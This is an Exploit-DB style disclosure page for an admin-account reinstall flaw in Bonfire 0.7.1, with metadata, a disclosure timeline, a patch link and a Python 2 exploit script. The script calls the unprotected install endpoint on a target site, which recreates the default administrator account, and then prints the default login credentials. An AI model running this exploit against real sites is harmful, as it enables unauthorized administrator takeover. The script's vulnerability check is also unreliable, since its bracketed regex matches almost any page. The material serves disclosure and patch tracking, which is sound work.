Bonefire v.0.7.1 Reinstall Admin Account Exploit

vendor:

Bonfire

by:

Mehmet INCE

7,5

CVSS

HIGH

Reinstall Admin Account Exploit

287

CWE

Product Name: Bonfire

Affected Version From: 0.7.1

Affected Version To: 0.7.1

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2014

Bonefire v.0.7.1 Reinstall Admin Account Exploit

Forgotten controls lead to call install module which lead to create default administrator account again!

Mitigation:

The vulnerability has been patched via following commit https://github.com/ci-bonfire/Bonfire/commit/9cb76c66babf89952c3d48279b026c59e198f46e

Source

Exploit-DB raw data:

#!/usr/bin/env python
# coding: utf-8
#
# Bonefire v.0.7.1 Reinstall Admin Account Exploit
#
# Author : Mehmet INCE
# 
# Analysis write-up : http://www.mehmetince.net/ci-bonefire-reinstall-admin-account-vulnerability-analysis-exploit/
#
# Description : 
# Forgotten controls lead to call install module which lead to
# create default administrator account again!
#
# TIMELINE
# 21 Apr 2014 14:00 –Vulnerability found
# 23 Apr 2014 21:20 – Analysis and write-up completed
# 23 Apr 2014 21:29 – First contact with lead developer of Bonfire
# 23 Apr 2014 21:33 – Response from lead developer
# 23 Apr 2014 21:52 – Vulnerability confirmed by lead developer
# 23 Apr 2014 21:55 – Vulnerability has been patched via following commit
# https://github.com/ci-bonfire/Bonfire/commit/9cb76c66babf89952c3d48279b026c59e198f46e

import urllib2
import sys
import re
target = sys.argv[1]
path = sys.argv[2]

if len(sys.argv) > 3:
     print "Usage : python bonfire www.target.com /path/"
     exit(0) 

content = urllib2.urlopen(target+path+"index.php/install/do_install").read()

if re.search('[admin@mybonefire.com]', content):
     print "Target is vulnerable!"
     print "Username : admin@mybonefire.com"
     print "Password : password"
else:
     print "Target is not vulnerable..."